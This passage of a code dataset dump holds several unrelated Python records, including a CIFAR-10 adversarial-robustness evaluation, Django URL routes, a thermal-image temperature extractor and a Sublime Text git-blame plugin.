\t 0, \t 0, data[63], \t\t 0, \t 0, \t \t 0, \t 0, \t\t 0]\n\n'''\ndef data_1Dto2D(data, Y=10, X=11):\n \n data_2D = np.zeros([1, Y, X, data.shape[1] ])\n\n data_2D[0,0,4:7,:] = data[21:24,:]\n\n data_2D[0,1,3:8,:] = data[24:29,:]\n \n data_2D[0,2,1:10,:] = data[29:38,:]\n\n data_2D[0,3,1,:] = data[39,:]\n data_2D[0,3,2:9,:] = data[0:7,:]\n data_2D[0,3,9,:] = data[39,:]\n \n data_2D[0,4,0,:] = data[42,:]\n data_2D[0,4,1,:] = data[40,:]\n data_2D[0,4,2:9,:] = data[7:14,:]\n data_2D[0,4,9,:] = data[41,:]\n data_2D[0,4,10,:] = data[43,:]\n \n data_2D[0,5,1,:] = data[44,:]\n data_2D[0,5,2:9,:] = data[14:21,:]\n data_2D[0,5,9,:] = data[45,:]\n \n data_2D[0,6,1:10,:] = data[46:55,:]\n\n data_2D[0,7,3:8,:] = data[55:60,:]\n \n data_2D[0,8,4:7,:] = data[60:63,:]\n \n data_2D[0,8,5,:] = data[63,:]\n \n return data_2D\n\n\ndef dataset_1Dto2D(dataset_1D):\n print('Dataset is being made 2D...',flush=True)\n dataset_2D = np.zeros([dataset_1D.shape[0],10,11,dataset_1D.shape[2]])\n for i in range(dataset_1D.shape[0]):\n dataset_2D[i,:,:,:] = data_1Dto2D(dataset_1D[i,:,:])\n print(\"Data is now 2D.\\n\",flush=True)\n return dataset_2D\n\n\ndef WindowCrop(data, labels, window_size):\n \n print(\"Dataset is being cropped in time 
axis...\",flush=True)\n \n tPoints = data.shape[-1]\n nWindows = int (np.floor( tPoints/window_size ) ) * 2 - 1 \n \n if len(data.shape) == 4:\n cData = np.zeros([data.shape[0],data.shape[1],data.shape[2],nWindows,window_size])\n for i in range(nWindows):\n cData[:,:,:,i,:] = data[:,:,:,i*int(window_size/2):i*int(window_size/2)+window_size]\n cData = np.moveaxis(cData, -2, 1)\n cData = np.reshape(cData,(-1,cData.shape[2],cData.shape[3],cData.shape[4]))\n else:\n cData = np.zeros([data.shape[0],data.shape[1],nWindows,window_size])\n for i in range(nWindows):\n cData[:,:,i,:] = data[:,:,i*int(window_size/2):i*int(window_size/2)+window_size]\n cData = np.moveaxis(cData, -2, 1)\n cData = np.reshape(cData,(-1,cData.shape[2],cData.shape[3]))\n \n \n labels = np.repeat(labels,nWindows,axis=0)\n \n print(\"Dataset is cropped. From shape\",data.shape,\"to\",cData.shape,\"\\n\",flush=True)\n \n return cData, labels\n \n \n \n","sub_path":"ProjectCode/data_loader_creation.py","file_name":"data_loader_creation.py","file_ext":"py","file_size_in_byte":16893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96429430","text":"import os\nimport threading\n\nsearch_orders = ['RDUL', 'RDLU', 'DRUL', 'DRLU', 'LUDR', 'LURD', 'ULDR', 'ULRD']\ndistance_zeroMovement = {1: 2, 2: 4, 3: 10, 4: 24, 5: 54, 6: 107, 7: 212}\n\nrun = \"Main.py\"\n\n\ndef int_to_fancy_string(number):\n number_as_string = str(number)\n digits_number = len(number_as_string)\n difference = 5 - digits_number\n return \"0\" * difference + number_as_string\n\n\ndef worker_strategic(strategy):\n for distance in range(1, 8):\n for zero_pozition in range(1, distance_zeroMovement[distance] + 1):\n file_prefix = \"4x4_0{d}_{z}\".format(d=distance, z=int_to_fancy_string(zero_pozition))\n input_file = \"{p}.txt\".format(p=file_prefix)\n for order in search_orders:\n solution_file = \"{p}_{s}_{o}_sol.txt\".format(p=file_prefix, s=strategy, o=order)\n info_file = \"{p}_{s}_{o}_stats.txt\".format(p=file_prefix, s=strategy, o=order)\n command = \"python {r} {s} {o} {i} {sol} {info}\".format(r=run, s=strategy, o=order, i=input_file, sol=solution_file, info=info_file)\n os.system(command)\n\n\ndef worker_astr(heur):\n for distance in range(1, 8):\n for zero_pozition in range(1, distance_zeroMovement[distance] + 1):\n file_prefix = \"4x4_0{d}_{z}\".format(d=distance, z=int_to_fancy_string(zero_pozition))\n input_file = \"{p}.txt\".format(p=file_prefix)\n solution_file = \"{p}_astr_{h}_sol.txt\".format(p=file_prefix, h=heur)\n info_file = \"{p}_astr_{h}_stats.txt\".format(p=file_prefix, h=heur)\n command = \"python {r} astr {h} {i} {sol} {info}\".format(r=run, h=heur, i=input_file, sol=solution_file, info=info_file)\n os.system(command)\n\n\nclass MyThread (threading.Thread):\n def __init__(self, func, name):\n threading.Thread.__init__(self)\n self.func = func\n self.name = name\n\n def run(self):\n print(\"Starting \" + self.name)\n self.func(self.name)\n print(\"Exiting \" + self.name)\n\n\ndef main():\n # Create new threads\n thread1 = MyThread(worker_strategic, 'bfs')\n thread2 = MyThread(worker_strategic, 'dfs')\n thread3 = MyThread(worker_astr, 'hamm')\n thread4 = MyThread(worker_astr, 'manh')\n\n # Start new Threads\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n thread1.join()\n thread2.join()\n thread3.join()\n thread4.join()\n print(\"Exiting Main Thread\")\n\n\nif __name__ == '__main__':\n 
main()","sub_path":"zad1/Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"576152798","text":"from knock72 import pn_list\nfrom knock76 import pl_list\n#from sklearn.metrics import confusion_matrix\n\ndef confmat_status(true_list,pre_list):\n tp = 0\n tn = 0\n fp = 0\n fn = 0\n for i in range(len(true_list)):\n if true_list[i] == pre_list[i]:\n if true_list[i] == 1:\n tp += 1\n else:\n tn += 1\n else:\n if true_list[i] == 1:\n fn += 1\n else:\n fp += 1\n# return [tp,tn,fp,fn]\n\n acc = (tp + tn) / (tp + tn + fp + fn) # accuracy\n pre = tp / (tp + fp) # precision\n rec = tp / (tp + fn) # recall\n f1 = 2 * pre * rec / (pre + rec)\n return [acc,pre,rec,f1]\n\nif __name__ == '__main__':\n result = confmat_status(pn_list,pl_list)\n print('accuracy:{}\\nprecision:{}\\nrecall:{}\\nf1_score:{}'.format(result[0],result[1],result[2],result[3]))\n\n\n# print(tp)\n# print(tn)\n# print(fp)\n# print(fn)\n# print(tp+tn+fn+fp)\n","sub_path":"yohta/chapter08/knock77.py","file_name":"knock77.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"263711136","text":"from typing import TYPE_CHECKING, Tuple, Type\nfrom weakref import proxy\n\nfrom ormar.fields import BaseField\nfrom ormar.fields.many_to_many import ManyToManyField\n\nif TYPE_CHECKING: # pragma no cover\n from ormar import Model\n\n\ndef get_relations_sides_and_names(\n to_field: Type[BaseField],\n parent: \"Model\",\n child: \"Model\",\n child_name: str,\n virtual: bool,\n) -> Tuple[\"Model\", \"Model\", str, str]:\n to_name = to_field.name\n if issubclass(to_field, ManyToManyField):\n child_name, to_name = (\n to_field.related_name\n or child.resolve_relation_name(\n parent, to_field.through, explicit_multi=True\n ),\n to_name,\n )\n child = proxy(child)\n elif virtual:\n child_name, to_name = to_name, child_name or child.get_name()\n child, parent = parent, proxy(child)\n else:\n child_name = child_name or child.get_name() + \"s\"\n child = proxy(child)\n return parent, child, child_name, to_name\n","sub_path":"ormar/relations/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"447554697","text":"# !pip install foolbox\nimport torch\nimport eagerpy as ep\nfrom foolbox import PyTorchModel, accuracy, samples\nimport foolbox.attacks as fa\nimport numpy as np\nimport json\n\nfrom torchvision.datasets import CIFAR10\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\n\ntorch.hub.set_dir('/data/torchhub/')\n\ntest_transform = transforms.Compose([\n transforms.ToTensor() # convert to tensor\n])\n\n# load data\ntestset = CIFAR10(\".\", train=False, download=True, transform=test_transform)\ntestloader = DataLoader(testset, batch_size=1000, shuffle=False)\n\nbottlenecks = [1,2,4,8,16,32]\nruns = range(0,10)\nventraldepths = [0,1,2,3,4]\n\nattacks = [\n fa.FGSM(),\n fa.LinfPGD(),\n fa.LinfBasicIterativeAttack(),\n fa.LinfAdditiveUniformNoiseAttack(),\n fa.LinfDeepFoolAttack(),\n]\n\nepsilons = [\n 0.0,\n 0.0005,\n 0.001,\n 0.0015,\n 0.002,\n 0.003,\n 0.005,\n 0.01,\n 0.02,\n 0.03,\n 0.1,\n 0.3,\n 0.5,\n 1.0,\n]\n\nresults = dict()\n\nfor vdepth in ventraldepths:\n results[vdepth] = dict()\n for bn in bottlenecks:\n results[vdepth][bn] = dict()\n for run in runs:\n print(vdepth, bn, run)\n \n 
results[vdepth][bn][run] = dict()\n \n model = torch.hub.load('ecs-vlc/opponency:master', 'colour_full', n_bn=bn, d_vvs=vdepth, rep=run)\n model.eval()\n fmodel = PyTorchModel(model, bounds=(0, 1))\n\n # images, labels = samples(fmodel, dataset=\"cifar10\", batchsize=20)\n # images = images.contiguous()\n\n\n # results[vdepth][bn][run][\"accuracy\"] = accuracy(fmodel, images, labels)\n\n attack_success = np.zeros((len(attacks), len(epsilons), len(testset)), dtype=np.bool)\n for i, attack in enumerate(attacks):\n print(attack)\n idx=0\n for images, labels in testloader:\n print('.', end='')\n images = images.to(fmodel.device)\n labels = labels.to(fmodel.device)\n\n _, _, success = attack(fmodel, images, labels, epsilons=epsilons)\n success_ = success.cpu().numpy()\n attack_success[i][:,idx:idx+len(labels)] = success_\n idx = idx + len(labels)\n print(\"\")\n for i, attack in enumerate(attacks):\n results[vdepth][bn][run][str(attack)] = (1.0 - attack_success[i].mean(axis=-1)).tolist()\n\n robust_accuracy = 1.0 - attack_success.max(axis=0).mean(axis=-1)\n results[vdepth][bn][run]['robust_accuracy'] = robust_accuracy.tolist()\n\n with open('adv-results-cifar-linf.json', 'w') as fp:\n json.dump(results, fp)\n","sub_path":"CifarAdverserial_Linf.py","file_name":"CifarAdverserial_Linf.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157607578","text":"#\n# SConscript for common-v4.5\n# Created: Aug 16, 2006 - Jdw\n# Updated: Aug 23, 2006 - Jdw\n# Add object install\n# Mar 30, 2011 jdw clone environment\nImport('env')\nenv=env.Clone()\n#\nif (len(env.subst('$MYDEBUG')) > 0):\n\tdict = env.Dictionary()\n\tfor k,v in dict.items():\n \t print(\"%s = %s\" % (k, str(v)))\n#\nlibName = 'common'\nlibSrcList =['src/RcsbPlatform.C',\n\t 'src/RcsbFile.C',\n\t 'src/BlockIO.C',\n\t 'src/CifString.C',\n\t 'src/Serializer.C',\n\t 'src/GenString.C',\n\t 'src/GenCont.C',\n\t 'src/Exceptions.C',\n\t 'src/DataInfo.C',\n \t 'src/mapped_vector.C',\n \t 'src/mapped_ptr_vector.C']\nlibObjList = [s.replace('.C','.o') for s in libSrcList]\n#\nlibIncList =['include/RcsbPlatform.h',\n\t 'include/RcsbFile.h',\n\t 'include/BlockIO.h',\n\t 'include/CifString.h',\n\t 'include/Serializer.h',\n\t 'include/rcsb_types.h',\n\t 'include/GenString.h',\n\t 'include/GenCont.h',\n\t 'include/Exceptions.h',\n\t 'include/DataInfo.h',\n \t 'include/mapped_vector.h',\n \t 'include/mapped_ptr_vector.h',\n \t 'src/mapped_vector.C',\n \t 'src/mapped_ptr_vector.C']\n#\nmyLib=env.Library(libName,libSrcList)\n#\n#\nenv.Install(env.subst('$MY_LIB_INSTALL_PATH'),myLib)\nenv.Alias('install-lib',env.subst('$MY_LIB_INSTALL_PATH'))\n#\nenv.Install(env.subst('$MY_INCLUDE_INSTALL_PATH'),libIncList)\nenv.Alias('install-include',env.subst('$MY_INCLUDE_INSTALL_PATH'))\n#\nenv.Default('install-lib','install-include')\n#\nenv.Install(env.subst('$MY_OBJ_INSTALL_PATH'),libObjList)\nenv.Alias('install-obj',env.subst('$MY_OBJ_INSTALL_PATH'))\n#\nenv.Default('install-lib','install-include','install-obj')\n#\n","sub_path":"SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"452557964","text":"from django.urls import path\nfrom manager import views\n\n\nurlpatterns = [\n path('', views.collections, name='home'),\n path('collections/add/', views.collections_add),\n path('collections/edit//', views.items, name='display_collection'),\n 
path('collections/edit//save/', views.collections_edit),\n path('collections/delete//', views.collections_delete),\n path('collections//items/add/', views.items_add),\n path('collections/items//', views.items_value, name='display_value'),\n path('collections/items//delete/', views.items_delete),\n path('collections/items//value/add/', views.items_value_add),\n path('collections/items/value//delete/', views.items_value_del),\n path('collections/items//field//generate/', views.items_value_generate),\n path('collections//generate/', views.collection_items_generate_selection),\n path('collections//generate/do/', views.collection_items_generate),\n path('collections//generate/fix/', views.collection_fix),\n path('collections//generate/do/fix/', views.collection_items_generate_fix),\n path('collections/duplicate//', views.collection_duplicate),\n\n path('types/', views.types, name='types'),\n path('types/add/', views.types_add),\n path('types/edit//', views.types_detail, name='types_detail'),\n path('types/edit//save/', views.types_edit),\n path('types/delete//', views.types_delete),\n path('types/option//add/', views.option_add),\n path('types/option//delete/', views.option_remove),\n path('types/subtype/add/', views.subtype_add),\n path('types/subtype/edit//', views.subtype_detail, name='subtype_detail'),\n path('types/subtype/edit//save/', views.subtype_edit),\n path('types/subtype/delete//', views.subtypes_delete),\n path('types/duplicate//', views.types_duplicate),\n\n path('exports/', views.exports, name='index_export'),\n path('exports/add/', views.exports_add),\n path('exports/delete//', views.exports_del),\n path('exports/duplicate//', views.export_duplicate),\n path('exports/edit//', views.exports_view, name='display_export'),\n path('exports/edit//save/', views.exports_update),\n path('exports//param/add/', views.exports_param_add),\n path('exports/param//delete/', views.exports_param_del),\n path('collections//export/', views.export_collection),\n\n path('tasks/', views.tasks, name='tasks')\n]\n","sub_path":"manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"202646746","text":"import logging\nimport argparse\nimport os\nimport sys\nimport mxnet as mx\nimport numpy as np\nfrom utils import load_from_caffe2_pkl\nfrom symbols.r3d_multiclass_relation import create_r3d\nfrom data_loader_ava_relation import ClipBatchIter\nimport pandas as pd\nfrom metric import RCNNAccMetric\nfrom config import config, update_config\n\n\ndef train(config):\n gpus = [int(i) for i in config.gpus.split(',')]\n num_gpus = len(gpus)\n\n logging.info(\"number of gpu %d\" % num_gpus)\n\n if len(gpus) == 0:\n kv = None\n else:\n kv = mx.kvstore.create('local')\n logging.info(\"Running on GPUs: {}\".format(gpus))\n\n # Modify to make it consistent with the distributed trainer\n total_batch_size = config.batch_per_device * num_gpus\n config.total_batch_size = total_batch_size\n\n # Create symbol, arg and aux\n if config.begin_epoch>0:\n sym, arg_params, aux_params = mx.model.load_checkpoint(os.path.join(config.output, 'test'), config.begin_epoch)\n else:\n # Create Network\n sym = create_r3d(\n num_class=config.num_class,\n no_bias=True,\n model_depth=config.model_depth,\n final_spatial_kernel=config.final_spatial_kernel,\n final_temporal_kernel=int(config.n_frame / 8),\n bn_mom=config.bn_mom,\n cudnn_tune=config.cudnn_tune,\n workspace=config.workspace,\n 
spatial_scale=config.spatial_scale,\n pooled_size=config.pooled_size,\n n_frame=config.n_frame,\n n_bbox=config.n_bbox,\n batch_per_device=config.batch_per_device,\n geometric_dim=config.geometric_dim,\n nongt_dim=config.nongt_dim,\n )\n # Load pretrained params\n arg_params, aux_params = {}, {}\n if config.pretrained:\n arg_params, aux_params = load_from_caffe2_pkl(config.pretrained, sym)\n logging.info(\"load pretrained okay, num of arg_p %d, num of aux_p %d\" % (len(arg_params), len(aux_params)))\n\n # Create Module\n # We can set fixed params here if needed\n m = mx.module.Module(sym, context=[mx.gpu(i) for i in gpus], data_names=['data', 'rois', 'mask'],\n label_names=['softmax_label'])\n\n if config.plot:\n v = mx.viz.plot_network(sym, title='R2Plus1D-train',\n shape={'data': (total_batch_size, 3, config.n_frame, config.scale_h, config.scale_w),\n 'rois': (total_batch_size, config.n_frame // config.temporal_scale, config.n_bbox, 5),\n 'mask': (total_batch_size, config.n_bbox),\n 'softmax_label': (total_batch_size, config.n_bbox, config.num_class)})\n v.render(filename=os.path.join(config.output, 'vis'), cleanup=True)\n\n train_data = mx.io.PrefetchingIter(ClipBatchIter(config=config, train=True))\n test_data = mx.io.PrefetchingIter(ClipBatchIter(config=config, train=False))\n\n # Set optimizer\n optimizer = config.optimizer\n optimizer_params = {}\n optimizer_params['learning_rate'] = config.lr\n optimizer_params['momentum'] = config.momentum\n optimizer_params['wd'] = config.wd\n\n print(config.lr)\n print(config.lr_step)\n\n if config.lr_step:\n optimizer_params['lr_scheduler'] = mx.lr_scheduler.FactorScheduler(step=config.lr_step,\n factor=config.lr_factor)\n # metric = RCNNAccMetric()\n\n\n def acc(label, pred):\n label = label.reshape((-1, config.num_class))\n # print('in acc, pred.size', pred.size, 'pred.shape', pred.shape, 'label.shape', label.shape, 'numerator', (label == np.round(pred)).sum(), 'res', float((label == np.round(pred)).sum()) / pred.size)\n return (label == np.round(pred)).astype(np.float32).mean()\n\n def all_correct_acc(label, pred):\n label = label.reshape((-1, config.num_class))\n # print('in acc, pred.size', pred.size, 'pred.shape', pred.shape, 'label.shape', label.shape, 'numerator', (label == np.round(pred)).sum(), 'res', float((label == np.round(pred)).sum()) / pred.size)\n equal = (label == np.round(pred)).astype(np.int32)\n equal_sum = equal.sum(axis=-1)\n return (equal_sum == label.shape[-1]).astype(np.float32).mean()\n\n\n def loss(label, pred):\n label = label.reshape((-1, config.num_class))\n loss_all = 0\n for i in range(len(pred)):\n loss = 0\n loss -= label[i] * np.log(pred[i] + 1e-6) + (1.- label[i]) * np.log(1. 
+ 1e-6 - pred[i])\n loss_all += np.sum(loss)\n loss_all = float(loss_all)/float(len(pred) + 0.000001)\n return loss_all\n\n eval_metric = list()\n eval_metric.append(mx.metric.np(acc))\n eval_metric.append(mx.metric.np(all_correct_acc))\n eval_metric.append(mx.metric.np(loss))\n\n m.fit(\n train_data=train_data,\n eval_data=test_data,\n eval_metric=eval_metric,\n epoch_end_callback=mx.callback.do_checkpoint(config.output + '/test', 1),\n batch_end_callback=mx.callback.Speedometer(total_batch_size, 20),\n kvstore=kv,\n optimizer=optimizer,\n optimizer_params=optimizer_params,\n initializer=mx.init.Xavier(factor_type=\"in\", magnitude=2.34),\n arg_params=arg_params,\n aux_params=aux_params,\n allow_missing=True,\n begin_epoch=config.begin_epoch,\n num_epoch=config.num_epoch,\n )\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Train R2Plus1D Network')\n # general\n parser.add_argument('--cfg', help='experiment configure file name', required=True, type=str)\n args = parser.parse_args()\n # update config\n config = update_config(args.cfg)\n\n # Create Output Dir\n if not os.path.exists(config.output):\n os.makedirs(config.output)\n\n # Set Logger\n logging.basicConfig(level=logging.DEBUG,\n filename=os.path.join(config.output, 'log.txt'),\n filemode='w')\n # Define a new Handler to log to console as well\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n logging.getLogger('').addHandler(console)\n\n # Start training\n logging.info(\" \".join(sys.argv))\n logging.info(config)\n\n train(config)","sub_path":"train_ava_relation.py","file_name":"train_ava_relation.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"266099961","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Emmanuel Gonzalez, Michele Cosi\nDate : 2020-07-02\nPurpose: Mean temp extraction\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nfrom osgeo import gdal\nimport cv2\nimport matplotlib.pyplot as plt\n#import matplotlib\nimport pandas as pd\nimport glob\nimport numpy as np\nfrom scipy import stats\nfrom scipy.signal import find_peaks\nimport random\nimport statistics\nimport json\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get command-line arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Rock the Casbah',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('dir',\n metavar='str',\n help='A positional argument')\n\n parser.add_argument('-od',\n '--outdir',\n help='Output directory',\n metavar='str',\n type=str,\n default='peak_mean_temp_out')\n\n parser.add_argument('-on',\n '--outname',\n help='Output filename',\n metavar='str',\n type=str,\n default='peak_mean_temp')\n\n parser.add_argument('-g',\n '--geo',\n help='GeoJSON of plots',\n type=str,\n required=True)\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef get_trt_zones():\n trt_zone_1 = []\n trt_zone_2 = []\n trt_zone_3 = []\n\n for i in range(3, 19):\n for i2 in range(2, 48):\n plot = f'MAC_Field_Scanner_Season_10_Range_{i}_Column_{i2}'\n #print(plot)\n trt_zone_1.append(str(plot))\n\n for i in range(20, 36):\n for i2 in range(2, 48):\n plot = f'MAC_Field_Scanner_Season_10_Range_{i}_Column_{i2}'\n #print(plot)\n trt_zone_2.append(str(plot))\n\n for i in range(37, 53):\n for i2 in range(2, 48):\n plot = f'MAC_Field_Scanner_Season_10_Range_{i}_Column_{i2}'\n #print(plot)\n 
trt_zone_3.append(str(plot))\n\n return trt_zone_1, trt_zone_2, trt_zone_3\n\n\n# --------------------------------------------------\ndef find_trt_zone(plot_name):\n trt_zone_1, trt_zone_2, trt_zone_3 = get_trt_zones()\n #print(trt_zone_1)\n\n if plot_name in trt_zone_1:\n trt = 'treatment 1'\n\n elif plot_name in trt_zone_2:\n trt = 'treatment 2'\n\n elif plot_name in trt_zone_3:\n trt = 'treatment 3'\n\n else:\n trt = 'border'\n\n return trt\n\n\n# --------------------------------------------------\ndef get_genotype(plot, geo):\n with open(geo) as f:\n data = json.load(f)\n\n for feat in data['features']:\n if feat.get('properties')['ID']==plot:\n genotype = feat.get('properties').get('genotype')\n\n return genotype\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n\n args = get_args()\n temp_dict = {}\n temp_cnt = 0\n img_list = glob.glob(f'{args.dir}/*/*.tif')\n print(img_list)\n\n if not os.path.isdir(args.outdir):\n os.makedirs(args.outdir)\n\n for one_img in img_list:\n temp_cnt += 1\n date = one_img.split('/')[-3][-10:]\n plot_raw = one_img.split('/')[-2]\n genotype = get_genotype(plot_raw, args.geo)\n plot_name = '_'.join(plot_raw.split(' '))\n trt_zone = find_trt_zone(plot_name)\n #print(f'{plot_name}')\n #print(f'{trt_zone}\\n')\n print(f'Processing {plot_raw}')\n\n img_out_path = os.path.join(args.outdir, plot_name)\n\n if not os.path.isdir(img_out_path):\n os.makedirs(img_out_path)\n\n g_img = gdal.Open(one_img)\n a_img = g_img.GetRasterBand(1).ReadAsArray()\n m = stats.mode(a_img)\n mode, count = m\n peak = mode[0][0:5].mean()\n temp = peak - 273.15\n\n a_img[a_img > peak] = np.nan\n mean_tc = np.nanmean(a_img) - 273.15\n\n driver = gdal.GetDriverByName('BMP')\n\n fig = plt.figure()\n plt.imshow(a_img)\n plt.savefig(img_out_path + f'/{plot_name}.png', transparent=True)\n\n temp_dict[temp_cnt] = {\n 'date': date,\n 'treatment': trt_zone,\n 'plot': plot_name,\n 'genotype': genotype,\n 'plot_temp': temp,\n 'mean_plant_temp': mean_tc\n }\n\n df = pd.DataFrame.from_dict(temp_dict, orient='index', columns=['date',\n 'treatment',\n 'plot',\n 'genotype',\n 'plot_temp',\n 'mean_plant_temp'])\n\n df.to_csv(os.path.join(args.outdir, args.outname + '.csv'), index=False)\n\n print(f'Done. Check outputs in {args.outdir}.')\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"peaks_temp/peaks_temp_up0729.py","file_name":"peaks_temp_up0729.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"220256774","text":"#P4\n\"\"\"\nA palindromic number reads the same both ways. 
The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n\"\"\"\nmax = 0\nfor i in range(100,1000):\n for j in range(100,1000):\n palindrome = i*j\n num = str(palindrome)[::-1] # reverse the number as a string; if it equals the original, it is a palindrome\n if (num == str(palindrome)):\n print(\"palindrome\",palindrome)\n if palindrome>max:\n max = palindrome\nprint(\"the largest is\",max)\n","sub_path":"P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"108384895","text":"# -*- coding: utf-8 -*-\n\nimport optparse\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('-H', '--host',\n default='localhost',\n dest='host',\n help='The host to connect to. Default to localhost.',\n type=str)\n parser.add_option('-p', '--port',\n default=5432,\n dest='port',\n help='The port to connect to. Default to 5432.',\n type=int)\n options, args = parser.parse_args()\n print(options, options.host, type(options.host))\n print(options, options.port, type(options.port))\n print(args)\n print('The host is %s, and the port is %d.' % (options.host, options.port))\n","sub_path":"CLITools/opt_with_values.py","file_name":"opt_with_values.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594888082","text":"import os\nimport subprocess\nfrom urllib.parse import parse_qs, quote_plus, urlparse\n\nimport sublime\nimport sublime_plugin\n\nfrom .settings import PKG_SETTINGS_KEY_CUSTOMBLAMEFLAGS, pkg_settings\nfrom .templates import blame_phantom_css, blame_phantom_html_template\nfrom .util import communicate_error, platform_startupinfo, view_is_suitable\n\n# @todo Make a command to open the latest diff (\"CommitDescription\") for the current line in a single keystroke.\n# @body Currently it takes a keystroke and then a mouse click on \"Show\"\n\n\nclass Blame(sublime_plugin.TextCommand):\n\n # Overrides --------------------------------------------------\n\n def __init__(self, view):\n super().__init__(view)\n self.phantom_set = sublime.PhantomSet(view, \"git-blame\")\n\n def run(self, edit, prevving=False, fixed_row_num=None, sha_skip_list=[]):\n if not view_is_suitable(self.view):\n return\n\n phantoms = []\n\n if prevving:\n # We'll be getting blame information for the line whose existing phantom's\n # [Prev] button was clicked, regardless of where the text cursor(s)\n # currently are.\n relevant_regions = [sublime.Region(self.view.text_point(fixed_row_num, 0))]\n else:\n # We'll be getting blame information for the lines where text cursor(s)\n # currently are.\n relevant_regions = self.view.sel()\n\n for region in relevant_regions:\n line_region = self.view.line(region)\n\n # When this Command is ran for a line with a phantom already visible, we\n # erase the phantom (i.e. toggle it). 
But if the reason this Command is\n # being ran is because the user is clicking the [Prev] button, just erasing\n # the existing phantom is not sufficient, because we need to then display\n # another phantom with updated content.\n if self.phantom_exists_for_region(line_region) and not prevving:\n continue\n\n row_num, _ = self.view.rowcol(region.begin())\n line_num = row_num + 1\n\n full_path = self.view.file_name()\n\n try:\n blame_output = self.get_blame(line_num, full_path, sha_skip_list)\n except Exception as e:\n communicate_error(e)\n return\n\n sha, user, date, time = self.parse_blame(blame_output)\n # The SHA output by `git blame` may have a leading caret to indicate that it\n # is a \"boundary commit\". That needs to be stripped before passing the SHA\n # back to git CLI commands for other purposes.\n sha_normalised = sha.strip(\"^\")\n\n if sha_skip_list:\n recently_skipped_sha = sha_skip_list[-1]\n if sha_normalised == recently_skipped_sha:\n sublime.message_dialog(\n \"No earlier commits affected line {0}\".format(line_num)\n )\n return\n\n phantoms.append(\n sublime.Phantom(\n line_region,\n blame_phantom_html_template.format(\n css=blame_phantom_css,\n sha=sha,\n sha_not_latest_indicator=\" *\" if sha_skip_list else \"\",\n user=user,\n date=date,\n time=time,\n qs_row_num_val=quote_plus(str(row_num)),\n qs_sha_val=quote_plus(sha_normalised),\n # Querystrings can contain the same key multiple times. We use that\n # functionality to accumulate a list of SHAs to skip over when\n # a [Prev] button has been clicked multiple times.\n qs_skip_keyvals=\"&\".join(\n [\n \"skip={0}\".format(quote_plus(skipee))\n for skipee in sha_skip_list\n ]\n ),\n ),\n sublime.LAYOUT_BLOCK,\n self.handle_phantom_button,\n )\n )\n\n self.phantom_set.update(phantoms)\n\n # ------------------------------------------------------------\n\n def get_blame(self, line, path, sha_skip_list):\n cmd_line = [\"git\", \"blame\", \"--minimal\", \"-w\", \"-L {0},{0}\".format(line)]\n for skipped_sha in sha_skip_list:\n cmd_line.extend([\"--ignore-rev\", skipped_sha])\n cmd_line.extend(pkg_settings().get(PKG_SETTINGS_KEY_CUSTOMBLAMEFLAGS, []))\n cmd_line.extend([\"--\", os.path.basename(path)])\n # print(cmd_line)\n return subprocess.check_output(\n cmd_line,\n cwd=os.path.dirname(os.path.realpath(path)),\n startupinfo=platform_startupinfo(),\n stderr=subprocess.STDOUT,\n ).decode(\"utf-8\")\n\n def parse_blame(self, blame):\n sha, file_path, user, date, time, tz_offset, *_ = blame.split()\n\n # Was part of the inital commit so no updates\n if file_path[0] == \"(\":\n user, date, time, tz_offset = file_path, user, date, time\n file_path = None\n\n # Fix an issue where the username has a space\n # Im going to need to do something better though if people\n # start to have multiple spaces in their names.\n if not date[0].isdigit():\n user = \"{0} {1}\".format(user, date)\n date, time = time, tz_offset\n\n return (sha, user[1:], date, time)\n\n def get_commit(self, sha, path):\n return subprocess.check_output(\n [\"git\", \"show\", \"--no-color\", sha],\n cwd=os.path.dirname(os.path.realpath(path)),\n startupinfo=platform_startupinfo(),\n stderr=subprocess.STDOUT,\n ).decode(\"utf-8\")\n\n def phantom_exists_for_region(self, region):\n return any(p.region == region for p in self.phantom_set.phantoms)\n\n def handle_phantom_button(self, href):\n url = urlparse(href)\n 